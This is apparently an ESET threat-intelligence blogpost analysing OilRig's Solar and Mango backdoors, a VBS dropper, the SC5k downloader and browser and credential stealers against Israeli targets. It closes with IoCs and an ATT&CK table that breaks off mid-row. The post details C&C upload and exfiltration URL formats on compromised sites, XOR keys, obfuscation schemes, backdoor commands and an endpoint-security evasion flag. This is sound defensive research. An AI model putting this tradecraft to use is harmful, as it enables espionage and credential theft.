{ "id": "4f9046e4-7c0e-4a0e-9273-8ec95f26f015", "created_at": "2026-04-06T00:18:14.223213Z", "updated_at": "2026-04-10T03:37:37.103333Z", "deleted_at": null, "sha1_hash": "5216b4cd9e4cbe88aa3fc04fe3be9081a31ed8b1", "title": "OilRig’s Outer Space and Juicy Mix: Same ol’ rig, new drill pipes", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 784803, "plain_text": "OilRig’s Outer Space and Juicy Mix: Same ol’ rig, new drill pipes\r\nBy Zuzana HromcováAdam Burgher\r\nArchived: 2026-04-05 13:26:31 UTC\r\nUPDATE (June 5th, 2025): Since publishing this blogpost, we have updated our tracking to better reflect the full\r\nrange and complexity of the malicious activities carried out by the OilRig APT group. As a result, we are now\r\ntracking OilRig as a parent group with several subgroups. The activities described in this blogpost fall under the\r\nOilRig subgroup named Lyceum.\r\nLyceum, also known as HEXANE or Storm-0133, is an advanced threat group that focuses on targeting various\r\nIsraeli organizations, including governmental and local governmental entities and organizations in healthcare.\r\nMajor tools we attribute to Lyceum include DanBot, the Shark, Milan, and Marlin backdoors, Solar and Mango,\r\nOilForceGTX, and a variety of downloaders using legitimate cloud services for C\u0026C communication.\r\nESET researchers have analyzed two campaigns by the OilRig APT group: Outer Space (2021), and Juicy Mix (2022). Both\r\nof these cyberespionage campaigns targeted Israeli organizations exclusively, which is in line with the group’s focus on the\r\nMiddle East, and used the same playbook: OilRig first compromised a legitimate website to use as a C\u0026C server and then\r\nused VBS droppers to deliver a C#/.NET backdoor to its victims, while also deploying a variety of post-compromise tools\r\nmostly used for data exfiltration on the target systems.\r\nIn their Outer Space campaign, OilRig used a simple, previously undocumented C#/.NET backdoor we named Solar, along\r\nwith a new downloader, SampleCheck5000 (or SC5k), that uses the Microsoft Office Exchange Web Services API for C\u0026C\r\ncommunication. For the Juicy Mix campaign, the threat actors improved on Solar to create the Mango backdoor, which\r\npossesses additional capabilities and obfuscation methods. In addition to detecting the malicious toolset, we also notified the\r\nIsraeli CERT about the compromised websites.\r\nKey points of this blogpost:\r\nESET observed two OilRig campaigns which occurred throughout 2021 (Outer Space) and 2022 (Juicy\r\nMix).\r\nThe operators exclusively targeted Israeli organizations and compromised legitimate Israeli websites for\r\nuse in their C\u0026C communications.\r\nThey used a new, previously undocumented C#/.NET first-stage backdoor in each campaign: Solar in\r\nOuter Space, then its successor Mango in Juicy Mix.\r\nBoth backdoors were deployed by VBS droppers, presumably spread via spearphishing emails.\r\nA variety of post-compromise tools were deployed in both campaigns, notably the SC5k downloader that\r\nuses Microsoft Office Exchange Web Services API for C\u0026C communication, and several tools to steal\r\nbrowser data and credentials from Windows Credential Manager.\r\nOilRig, also known as APT34, Lyceum, or Siamesekitten, is a cyberespionage group that has been active since at least 2014\r\nand is commonly believed to be based in Iran. The group targets Middle Eastern governments and a variety of business\r\nverticals, including chemical, energy, financial, and telecommunications. OilRig carried out the DNSpionage campaign in\r\n2018 and 2019, which targeted victims in Lebanon and the United Arab Emirates. In 2019 and 2020, OilRig continued\r\nattacks with the HardPass campaign, which used LinkedIn to target Middle Eastern victims in the energy and government\r\nsectors. In 2021, OilRig updated its DanBot backdoor and began deploying the Shark, Milan, and Marlin backdoors,\r\nmentioned in the T3 2021 issue of the ESET Threat Report.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 1 of 18\n\nIn this blogpost, we provide technical analysis of the Solar and Mango backdoors, of the VBS dropper used to deliver\r\nMango, and of the post-compromise tools deployed in each campaign.\r\nAttribution\r\nThe initial link that allowed us to connect the Outer Space campaign to OilRig is the use of the same custom Chrome data\r\ndumper (tracked by ESET researchers under the name MKG) as in the Out to Sea campaign. We observed the Solar\r\nbackdoor deploy the very same sample of MKG as in Out to Sea on the target’s system, along with two other variants.\r\nBesides the overlap in tools and targeting, we also saw multiple similarities between the Solar backdoor and the backdoors\r\nused in Out to Sea, mostly related to upload and download: both Solar and Shark, another OilRig backdoor, use URIs with\r\nsimple upload and download schemes to communicate with the C\u0026C server, with a “d” for download and a “u” for upload;\r\nadditionally, the downloader SC5k uses uploads and downloads subdirectories just like other OilRig backdoors, namely\r\nALMA, Shark, DanBot, and Milan. These findings serve as a further confirmation that the culprit behind Outer Space is\r\nindeed OilRig.\r\nAs for the Juicy Mix campaign’s ties to OilRig, besides targeting Israeli organizations – which is typical for this espionage\r\ngroup – there are code similarities between Mango, the backdoor used in this campaign, and Solar. Moreover, both\r\nbackdoors were deployed by VBS droppers with the same string obfuscation technique. The choice of post-compromise\r\ntools employed in Juicy Mix also mirrors previous OilRig campaigns.\r\nOuter Space campaign overview\r\nNamed for the use of an astronomy-based naming scheme in its function names and tasks, Outer Space is an OilRig\r\ncampaign from 2021. In this campaign, the group compromised an Israeli human resources site and subsequently used it as a\r\nC\u0026C server for its previously undocumented C#/.NET backdoor, Solar. Solar is a simple backdoor with basic functionality\r\nsuch as reading and writing from disk, and gathering information.\r\nThrough Solar, the group then deployed a new downloader SC5k, which uses the Office Exchange Web Services API to\r\ndownload additional tools for execution, as shown in Figure 1. In order to exfiltrate browser data from the victim’s system,\r\nOilRig used a Chrome-data dumper called MKG.\r\nFigure 1. Overview of OilRig’s Outer Space compromise chain\r\nJuicy Mix campaign overview\r\nIn 2022 OilRig launched another campaign targeting Israeli organizations, this time with an updated toolset. We named the\r\ncampaign Juicy Mix for the use of a new OilRig backdoor, Mango (based on its internal assembly name, and its filename,\r\nMango.exe). In this campaign, the threat actors compromised a legitimate Israeli job portal website for use in C\u0026C\r\ncommunications. The group’s malicious tools were then deployed against a healthcare organization, also based in Israel.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 2 of 18\n\nThe Mango first-stage backdoor is a successor to Solar, also written in C#/.NET, with notable changes that include\r\nexfiltration capabilities, use of native APIs, and added detection evasion code.\r\nAlong with Mango, we also detected two previously undocumented browser-data dumpers used to steal cookies, browsing\r\nhistory, and credentials from the Chrome and Edge browsers, and a Windows Credential Manager stealer, all of which we\r\nattribute to OilRig. These tools were all used against the same target as Mango, as well as at other compromised Israeli\r\norganizations throughout 2021 and 2022. Figure 2 shows an overview of how the various components were used in the Juicy\r\nMix campaign.\r\nFigure 2. Overview of components used in OilRig’s Juicy Mix campaign\r\nTechnical analysis\r\nIn this section, we provide a technical analysis of the Solar and Mango backdoors and the SC5k downloader, as well as other\r\ntools that were deployed to the targeted systems in these campaigns.\r\nVBS droppers\r\nTo establish a foothold on the target’s system, Visual Basic Script (VBS) droppers were used in both campaigns, which were\r\nvery likely spread by spearphishing emails. Our analysis below focuses on the VBS script used to drop Mango (SHA-1:\r\n3699B67BF4E381847BF98528F8CE2B966231F01A); note that Solar’s dropper is very similar.\r\nThe dropper’s purpose is to deliver the embedded Mango backdoor, schedule a task for persistence, and register the\r\ncompromise with the C\u0026C server. The embedded backdoor is stored as a series of base64 substrings, which are\r\nconcatenated and base64 decoded. As shown in Figure 3, the script also uses a simple string deobfuscation technique, where\r\nstrings are assembled using arithmetic operations and the Chr function.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 3 of 18\n\nFigure 3. String deobfuscation technique used by OilRig’s VBS dropper for Mango\r\nOn top of that, Mango’s VBS dropper adds another type of string obfuscation and code to set up persistence and register\r\nwith the C\u0026C server. As shown in Figure 4, to deobfuscate some strings, the script replaces any characters in the set #*+-_)\r\n(}{@$%^\u0026 with 0, then divides the string into three-digit numbers that are then converted into ASCII characters using the\r\nChr function. For example, the string 116110101109117+99111$68+77{79$68}46-50108109120115}77 translates to\r\nMsxml2.DOMDocument.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 4 of 18\n\nFigure 4. String obfuscation function used by Mango’s VBS dropper\r\nOnce the backdoor is embedded on the system, the dropper moves on to create a scheduled task that executes Mango (or\r\nSolar, in the other version) every 14 minutes. Finally, the script sends a base64-encoded name of the compromised computer\r\nvia a POST request to register the backdoor with its C\u0026C server.\r\nSolar backdoor\r\nSolar is the backdoor used in OilRig’s Outer Space campaign. Possessing basic functionalities, this backdoor can be used to,\r\namong other things, download and execute files, and automatically exfiltrate staged files.\r\nWe chose the name Solar based on the filename used by OilRig, Solar.exe. It is a fitting name since the backdoor uses an\r\nastronomy naming scheme for its function names and tasks used throughout the binary (Mercury, Venus, Mars, Earth, and\r\nJupiter).\r\nSolar begins execution by performing the steps shown in Figure 5.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 5 of 18\n\nFigure 5. Initial execution flow of Solar\r\nThe backdoor creates two tasks, Earth and Venus, that run in memory. There is no stop function for either of the two\r\ntasks, so they will run indefinitely. Earth is scheduled to run every 30 seconds and Venus is set to run every 40 seconds.\r\nEarth is the primary task, responsible for the bulk of Solar’s functions. It communicates with the C\u0026C server using the\r\nfunction MercuryToSun, which sends basic system and malware version information to the C\u0026C server and then handles the\r\nserver’s response. Earth sends the following info to the C\u0026C server:\r\nThe string (@) \u003csystem hostname\u003e; the whole string is encrypted.\r\nThe string 1.0.0.0, encrypted (possibly a version number).\r\nThe string 30000, encrypted (possibly the scheduled runtime of Earth in milliseconds).\r\nEncryption and decryption are implemented in functions named JupiterE and JupiterD, respectively. Both of them call a\r\nfunction named JupiterX, which implements an XOR loop as shown in Figure 6.\r\nFigure 6. The for loop in JupiterX that is used to encrypt and decrypt data\r\nThe key is derived from a hardcoded global string variable, 6sEj7*0B7#7, and a nonce: in this case, a random hex string\r\nfrom 2–24 characters long. Following the XOR encryption, standard base64 encoding is applied.\r\nAn Israeli human resources company’s web server, which OilRig compromised at some point before deploying Solar, was\r\nused as the C\u0026C server:\r\nhttp://organization.co[.]il/project/templates/office/template.aspx?rt=d\u0026sun=\u003cencrypted_MachineGuid\u003e\u0026rn=\r\n\u003cencryption_nonce\u003e\r\nPrior to being appended to the URI, the encryption nonce is encrypted, and the value of the initial query string, rt, is set to d\r\nhere, likely for “download”.\r\nThe last step of the MercuryToSun function is to process a response from the C\u0026C server. It does so by retrieving a\r\nsubstring of the response, which is found between the characters QQ@ and @kk. This response is a string of instructions\r\nseparated by asterisks (*) that is processed into an array. Earth then carries out the backdoor commands, which include\r\ndownloading additional payloads from the server, listing files on the victim’s system, and running specific executables.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 6 of 18\n\nCommand output is then gzip compressed using the function Neptune and encrypted with the same encryption key and a\r\nnew nonce. Then the results are uploaded to the C\u0026C server, thus:\r\nhttp://organization.co[.]il/project/templates/office/template.aspx?rt=u\u0026sun=\u003cMachineGuid\u003e\u0026rn=\u003cnew_nonce\u003e\r\nMachineGuid and the new nonce are encrypted with the JupiterE function, and here the value of rt is set to u, likely for\r\n“upload”.\r\nVenus, the other scheduled task, is used for automated data exfiltration. This small task copies the content of files from a\r\ndirectory (also named Venus) to the C\u0026C server. These files are likely dropped here by some other, as yet unidentified,\r\nOilRig tool. After uploading a file, the task deletes it from disk.\r\nMango backdoor\r\nFor its Juicy Mix campaign, OilRig switched from the Solar backdoor to Mango. It has a similar workflow to Solar and\r\noverlapping capabilities, but there are nevertheless several notable changes:\r\nUse of TLS for C\u0026C communications.\r\nUse of native APIs, rather than .NET APIs, to execute files and shell commands.\r\nAlthough not actively used, detection evasion code was introduced.\r\nSupport for automated exfiltration (Venus in Solar) has been removed; instead, Mango supports an additional\r\nbackdoor command for exfiltrating selected files.\r\nSupport for log mode has been removed, and symbol names have been obfuscated.\r\nContrary to Solar’s astronomy-themed naming scheme, Mango obfuscates its symbol names, as can be seen in Figure 7.\r\nFigure 7. Unlike its predecessor Solar (left), Mango’s symbols have been obfuscated\r\nBesides the symbol name obfuscation, Mango also uses the string stacking method (as shown in Figure 8) to obfuscate\r\nstrings, which complicates the use of simple detection methods.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 7 of 18\n\nFigure 8. Mango uses string stacking to obfuscate strings and thwart simple detection mechanisms\r\nSimilar to Solar, the Mango backdoor starts by creating an in-memory task, scheduled to run indefinitely every 32 seconds.\r\nThis task communicates with the C\u0026C server and executes backdoor commands, similar to Solar’s Earth task. While\r\nSolar also creates Venus, a task for automated exfiltration, this functionality has been replaced in Mango by a new backdoor\r\ncommand.\r\nIn the main task, Mango first generates a victim identifier, \u003cvictimID\u003e, to be used in C\u0026C communications. The ID is\r\ncomputed as an MD5 hash of \u003cmachine name\u003e\u003cusername\u003e, formatted as a hexadecimal string.\r\nTo request a backdoor command, Mango then sends the string d@\u003cvictimID\u003e@\u003cmachine name\u003e|\u003cusername\u003e to the C\u0026C\r\nserver http://www.darush.co[.]il/ads.asp – a legitimate Israeli job portal, likely compromised by OilRig before this\r\ncampaign. We notified the Israeli national CERT organization about the compromise.\r\nThe request body is constructed as follows:\r\nThe data to be transmitted is XOR encrypted using the encryption key Q\u00264g, then base64 encoded.\r\nA pseudorandom string of 3–14 characters is generated from this alphabet (as it appears in the code):\r\ni8p3aEeKQbN4klFMHmcC2dU9f6gORGIhDBLS0jP5Tn7o1AVJ.\r\nThe encrypted data is inserted in a pseudorandom position within the generated string, enclosed between [@ and @]\r\ndelimiters.\r\nTo communicate with its C\u0026C server, Mango uses the TLS (Transport Layer Security) protocol, which is used to provide an\r\nadditional layer of encryption.\r\nSimilarly, the backdoor command received from the C\u0026C server is XOR encrypted, base64 encoded, and then enclosed\r\nbetween [@ and @] within the HTTP response body. The command itself is either NCNT (in which case no action is\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 8 of 18\n\ntaken), or a string of several parameters delimited by @, as detailed in Table 1, which lists Mango’s backdoor commands.\r\nNote that \u003cArg0\u003e is not listed in the table, but is used in the response to the C\u0026C server.\r\nTable 1. List of Mango’s backdoor commands\r\nArg1 Arg2 Arg3 Action taken Return value\r\n1 or\r\nempty\r\nstring\r\n+sp\r\n\u003coptional\r\narguments\u003e\r\nN/A\r\nExecutes the specified file/shell\r\ncommand (with the optional arguments),\r\nusing the native CreateProcess API\r\nimported via DllImport. If the arguments\r\ncontain [s], it is replaced by\r\nC:\\Windows\\System32\\.\r\nCommand output.\r\n+nu N/A\r\nReturns the malware version string and\r\nC\u0026C URL.\r\n\u003cversionString\u003e|\u003cc2URL\u003e; in this\r\ncase:\r\n1.0.0|http://www.darush.co[.]il/ads.asp\r\n+fl\r\n\u003coptional\r\ndirectory\r\nname\u003e\r\nN/A\r\nEnumerates the content of the specified\r\ndirectory (or current working directory).\r\nDirectory of \u003cdirectory path\u003e\r\nFor each subdirectory:\r\n\u003clast_write_time\u003e \u003cDIR\u003e\r\n\u003csubdirectory name\u003e\r\nFor each file:\r\n\u003clast_write_time\u003e FILE \u003cfile size\u003e\r\n\u003cfilename\u003e\r\n\u003cnumber of subdirectories\u003e Dir(s)\r\n\u003cnumber of files\u003e File(s)\r\n+dn \u003cfile\r\nname\u003e\r\nN/A\r\nUploads the file content to the C\u0026C\r\nserver via a new HTTP POST request\r\nformatted: u@\u003cvictimID\u003e@\u003cmachine\r\nname\u003e|\u003cusername\u003e@\u003cfile\r\npath\u003e@2@\u003cbase64encodedFileContent\u003e.\r\nOne of:\r\n·       file[\u003cfilename\u003e] is uploaded to\r\nserver.\r\n·       file not found!\r\n·       file path empty!\r\n2\r\nBase64-\r\nencoded\r\ndata\r\nFilename\r\nDumps the specified data into a file in the\r\nworking directory.\r\nfile downloaded to\r\npath[\u003cfullFilePath\u003e]\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 9 of 18\n\nEach backdoor command is handled in a new thread, and their return values are then base64 encoded and combined with\r\nother metadata. Finally, that string is sent to the C\u0026C server using the same protocol and encryption method as described\r\nabove.\r\nUnused detection evasion technique\r\nInterestingly, we found an unused detection evasion technique within Mango. The function responsible for executing files\r\nand commands downloaded from the C\u0026C server takes an optional second parameter – a process ID. If set, Mango then uses\r\nthe UpdateProcThreadAttribute API to set the PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY (0x20007)\r\nattribute for the specified process to value:\r\nPROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON\r\n(0x100000000000), as shown in Figure 9.\r\nFigure 9. Unused security product evasion code in Mango backdoor\r\nThis technique’s goal is to block endpoint security solutions from loading their user-mode code hooks via a DLL in this\r\nprocess. While the parameter was not used in the sample we analyzed, it could be activated in future versions.\r\nVersion 1.1.1\r\nUnrelated to the Juicy Mix campaign, in July 2023 we found a new version of the Mango backdoor (SHA-1:\r\nC9D18D01E1EC96BE952A9D7BD78F6BBB4DD2AA2A), uploaded to VirusTotal by several users under the name\r\nMenorah.exe. The internal version in this sample was changed from 1.0.0 to 1.1.1, but the only notable change is the use of a\r\ndifferent C\u0026C server, http://tecforsc-001-site1.gtempurl[.]com/ads.asp.\r\nAlong with this version, we also discovered a Microsoft Word document (SHA-1:\r\n3D71D782B95F13EE69E96BCF73EE279A00EAE5DB) with a malicious macro that drops the backdoor. Figure 10 shows\r\nthe fake warning message, enticing the user to enable macros for the document, and the decoy content that is displayed\r\nafterwards, while the malicious code is running in the background.\r\nFigure 10. Microsoft Word document with a malicious macro that drops Mango v1.1.1\r\nPost-compromise tools\r\nIn this section, we review a selection of post-compromise tools used in OilRig’s Outer Space and Juicy Mix campaigns,\r\naimed at downloading and executing additional payloads, and stealing data from the compromised systems.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 10 of 18\n\nSampleCheck5000 (SC5k) downloader\r\nSampleCheck5000 (or SC5k) is a downloader used to download and execute additional OilRig tools, notable for using the\r\nMicrosoft Office Exchange Web Services API for C\u0026C communication: the attackers create draft messages in this email\r\naccount and hide the backdoor commands in there. Subsequently, the downloader logs into the same account, and parses the\r\ndrafts to retrieve commands and payloads to execute.\r\nSC5k uses predefined values – Microsoft Exchange URL, email address, and password – to log into the remote Exchange\r\nserver, but it also supports the option to override these values using a configuration file in the current working directory\r\nnamed setting.key. We chose the name SampleCheck5000 based on one of the email addresses that the tool used in the Outer\r\nSpace campaign.\r\nOnce SC5k logs into the remote Exchange server, it retrieves all the emails in the Drafts directory, sorts them by most\r\nrecent, keeping only the drafts that have attachments. It then iterates over every draft message with an attachment, looking\r\nfor JSON attachments that contain \"data\" in the body. It extracts the value from the key data in the JSON file, base64\r\ndecodes and decrypts the value, and calls cmd.exe to execute the resulting command line string. SC5k then saves the output\r\nof the cmd.exe execution to a local variable.\r\nAs the next step in the loop, the downloader reports the results to the OilRig operators by creating a new email message on\r\nthe Exchange server and saving it as a draft (not sending), as shown in Figure 11. A similar technique is used to exfiltrate\r\nfiles from a local staging folder. As the last step in the loop, SC5k also logs the command output in an encrypted and\r\ncompressed format on disk.\r\nFigure 11. Email message creation by SC5k\r\nBrowser-data dumpers\r\nIt is characteristic of OilRig operators to use browser-data dumpers in their post-compromise activities. We discovered two\r\nnew browser-data stealers among the post-compromise tools deployed in the Juicy Mix campaign alongside the Mango\r\nbackdoor. They dump the stolen browser data in the %TEMP% directory into files named Cupdate and Eupdate (hence\r\nour names for them: CDumper and EDumper).\r\nBoth tools are C#/.NET browser-data stealers, collecting cookies, browsing history, and credentials from the Chrome\r\n(CDumper) and Edge (EDumper) browsers. We focus our analysis on CDumper, since both stealers are practically identical,\r\nsave for some constants.\r\nWhen executed, CDumper creates a list of users with Google Chrome installed. On execution, the stealer connects to the\r\nChrome SQLite Cookies, History and Login Data databases under %APPDATA%\\Local\\Google\\Chrome\\User Data, and\r\ncollects browser data including visited URLs and saved logins, using SQL queries.\r\nThe cookie values are then decrypted, and all collected information is added to a log file named C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Local\\Temp\\Cupdate, in cleartext. This functionality is implemented in CDumper functions named\r\nCookieGrab (see Figure 12), HistoryGrab, and PasswordGrab. Note that there is no exfiltration mechanism implemented\r\nin CDumper, but Mango can exfiltrate selected files via a backdoor command.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 11 of 18\n\nFigure 12. CDumper’s CookieGrab function dumps and decrypts cookies from the Chrome data store\r\nIn both Outer Space and the earlier Out to Sea campaign, OilRig used a C/C++ Chrome data dumper called MKG. Like\r\nCDumper and EDumper, MKG was also able to steal usernames and passwords, browsing history, and cookies from the\r\nbrowser. This Chrome data dumper is typically deployed in the following file locations (with the first location being the\r\nmost common):\r\n %USERS%\\public\\programs\\vmwaredir\\\u003crandom_14_character_string\u003e\\mkc.exe\r\n%USERS%\\Public\\M64.exe\r\nWindows Credential Manager stealer\r\nBesides browser-data dumping tools, OilRig also used a Windows Credential Manager stealer in the Juicy Mix campaign.\r\nThis tool steals credentials from Windows Credential Manager, and similar to CDumper and EDumper, stores them in the\r\n%TEMP% directory – this time into a file named IUpdate (hence the name IDumper). Unlike CDumper and EDumper,\r\nIDumper is implemented as a PowerShell script.\r\nAs with the browser dumper tools, it is not uncommon for OilRig to collect credentials from the Windows Credential\r\nManager. Previously, OilRig’s operators were observed using VALUEVAULT, a publicly available, Go-compiled credential-theft tool (see the 2019 HardPass campaign and a 2020 campaign), for the same purpose.\r\nConclusion\r\nOilRig continues to innovate and create new implants with backdoor-like capabilities while finding new ways to execute\r\ncommands on remote systems. The group improved upon its C#/.NET Solar backdoor from the Outer Space campaign to\r\ncreate a new backdoor named Mango for the Juicy Mix campaign. The group deploys a set of custom post-compromise tools\r\nthat are used to collect credentials, cookies, and browsing history from major browsers and from the Windows Credential\r\nManager. Despite these innovations, OilRig also continues to rely on established ways to obtain user data.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.\r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 12 of 18\n\nthe ESET Threat Intelligence page.\r\nIoCs\r\nFiles\r\nSHA-1 Filename ESET detection name Descriptio\r\n3D71D782B95F13EE69E96BCF73EE279A00EAE5DB MyCV.doc VBA/OilRig.C\r\nDocument\r\nwith\r\nmalicious\r\nmacro\r\ndropping\r\nMango.\r\n3699B67BF4E381847BF98528F8CE2B966231F01A chrome_log.vbs VBS/TrojanDropper.Agent.PCC\r\nVBS\r\ndropper.\r\n1DE4810A10FA2D73CC589CA403A4390B02C6DA5E Solar.exe MSIL/OilRig.E\r\nSolar\r\nbackdoor.\r\nCB26EBDE498ECD2D7CBF1BC498E1BCBB2619A96C Mango.exe MSIL/OilRig.E\r\nMango\r\nbackdoor\r\n(v1.0.0).\r\nC9D18D01E1EC96BE952A9D7BD78F6BBB4DD2AA2A Menorah.exe MSIL/OilRig.E\r\nMango\r\nbackdoor\r\n(v1.1.1).\r\n83419CBA55C898FDBE19DFAFB5B1B207CC443190 EdgeUpdater.exe MSIL/PSW.Agent.SXJ\r\nEdge data\r\ndumper.\r\nDB01095AFEF88138C9ED3847B5D8AF954ED7BBBC Gr.exe MSIL/PSW.Agent.SXJ\r\nChrome\r\ndata\r\ndumper.\r\nBE01C95C2B5717F39B550EA20F280D69C0C05894 ieupdater.exe PowerShell/PSW.Agent.AH\r\nWindows\r\nCredential\r\nManager\r\ndumper.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 13 of 18\n\n6A1BA65C9FD8CC9DCB0657977DB2B03DACDD8A2A mkc.exe Win64/PSW.Agent.AW\r\nMKG -\r\nChrome\r\ndata\r\ndumper.\r\n94C08A619AF2B08FEF08B131A7A59D115C8C2F7B mkkc.exe Win64/PSW.Agent.AW\r\nMKG -\r\nChrome\r\ndata\r\ndumper.\r\nCA53B8EB76811C1940D814AAA8FE875003805F51 cmk.exe Win64/PSW.Agent.AW\r\nMKG -\r\nChrome\r\ndata\r\ndumper.\r\nBE9B6ACA8A175DF61F2C75932E029F19789FD7E3 CCXProcess.exe MSIL/OilRig.A\r\nSC5k\r\ndownloade\r\n(32-bit\r\nversion).\r\n2236D4DCF68C65A822FF0A2AD48D4DF99761AD07 acrotray.exe MSIL/OilRig.D\r\nSC5k\r\ndownloade\r\n(64-bit\r\nversion).\r\nEA8C3E9F418DCF92412EB01FCDCDC81FDD591BF1 node.exe MSIL/OilRig.D\r\nSC5k\r\ndownloade\r\n(64-bit\r\nversion).\r\nNetwork\r\nIP Domain Hosting provider First seen Details\r\n199.102.48[.]42 tecforsc-001-site1.gtempurl[.]com MarquisNet 2022-07-29 N/A\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 13 of the MITRE ATT\u0026CK framework.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 14 of 18\n\nTactic ID Name Description\r\nResource\r\nDevelopment\r\nT1584.004\r\nCompromise Infrastructure:\r\nServer\r\nIn both Outer Space and Juicy Mix campaigns,\r\nOilRig has compromised legitimate websites to\r\nstage malicious tools and for C\u0026C communications.\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nOilRig has developed custom backdoors (Solar and\r\nMango), a downloader (SC5k), and a set of\r\ncredential-theft tools for use in its operations.\r\nT1608.001\r\nStage Capabilities: Upload\r\nMalware\r\nOilRig has uploaded malicious components to its\r\nC\u0026C servers, and stored prestaged files and\r\ncommands in the Drafts email directory of an Office\r\n365 account for SC5k to download and execute.\r\nT1608.002\r\nStage Capabilities: Upload\r\nTool\r\nOilRig has uploaded malicious tools to its C\u0026C\r\nservers, and stored prestaged files in the Drafts\r\nemail directory of an Office 365 account for SC5k\r\nto download and execute.\r\nInitial Access T1566.001\r\nPhishing: Spearphishing\r\nAttachment\r\nOilRig probably distributed its Outer Space and\r\nJuicy Mix campaigns via phishing emails with their\r\nVBS droppers attached.\r\nExecution\r\nT1053.005\r\nScheduled Task/Job:\r\nScheduled Task\r\nOilRig’s IDumper, EDumper, and CDumper tools\r\nuse scheduled tasks named ie\u003cuser\u003e, ed\u003cuser\u003e, and\r\ncu\u003cuser\u003e to execute themselves under the context of\r\nother users.\r\nSolar and Mango use a C#/.NET task on a timer to\r\niteratively execute their main functions.\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nOilRig’s IDumper tool uses PowerShell for\r\nexecution.\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nOilRig’s Solar, SC5k, IDumper, EDumper, and\r\nCDumper use cmd.exe to execute tasks on the\r\nsystem.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 15 of 18\n\nT1059.005\r\nCommand and Scripting\r\nInterpreter: Visual Basic\r\nOilRig uses a malicious VBScript to deliver and\r\npersist its Solar and Mango backdoors.\r\nT1106 Native API\r\nOilRig’s Mango backdoor uses the CreateProcess\r\nWindows API for execution.\r\nPersistence T1053.005\r\nScheduled Task/Job:\r\nScheduled Task\r\nOilRig’s VBS dropper schedules a task named\r\nReminderTask to establish persistence for the\r\nMango backdoor.\r\nDefense\r\nEvasion\r\nT1036.005\r\nMasquerading: Match\r\nLegitimate Name or Location\r\nOilRig uses legitimate or innocuous filenames for\r\nits malware to disguise itself from defenders and\r\nsecurity software.\r\nT1027.002\r\nObfuscated Files or\r\nInformation: Software\r\nPacking\r\nOilRig has used SAPIEN Script Packager and\r\nSmartAssembly obfuscator to obfuscate its IDumper\r\ntool.\r\nT1027.009\r\nObfuscated Files or\r\nInformation: Embedded\r\nPayloads\r\nOilRig’s VBS droppers have malicious payloads\r\nembedded within them as a series of base64\r\nsubstrings.\r\nT1036.004\r\nMasquerading: Masquerade\r\nTask or Service\r\nIn order to appear legitimate, Mango’s VBS dropper\r\nschedules a task with the description Start notepad\r\nat a certain time.\r\nT1070.009\r\nIndicator Removal: Clear\r\nPersistence\r\nOilRig’s post-compromise tools delete their\r\nscheduled tasks after a certain time period.\r\nT1140\r\nDeobfuscate/Decode Files or\r\nInformation\r\nOilRig uses several obfuscation methods to protect\r\nits strings and embedded payloads.\r\nT1553 Subvert Trust Controls\r\nSC5k uses Office 365, generally a trusted third party\r\nand often overlooked by defenders, as a download\r\nsite.\r\nT1562 Impair Defenses\r\nOilRig’s Mango backdoor has an (as yet) unused\r\ncapability to block endpoint security solutions from\r\nloading their user-mode code in specific processes.\r\nhttps://www.welivesecurity.com/en/eset-research/oilrigs-outer-space-juicy-mix-same-ol-rig-new-drill-pipes/\r\nPage 16 of 18\n\nCredential\r\nAccess\r\nT1555.003\r\nCredentials from Password\r\nStores: Credentials from Web\r\nBrowsers\r\nOilRig’s custom tools MKG, CDumper, and\r\nEDumper can obtain credentials, cookies, and\r\nbrowsing history from Chrome and Edge browsers.\r\nT1555.004\r\nCredentials from Password\r\nStores: Windows Credential\r\nManager\r\nOilRig’s custom credential dumping tool IDumper\r\ncan steal credentials from the Windows Credential\r\nManager.\r\nDiscovery\r\nT1082\r\nSystem Information\r\nDiscovery\r\nMango obtains the compromised computer name.\r\nT1083 File and Directory Discovery\r\nMango has a command to enumerate the content of\r\na specified 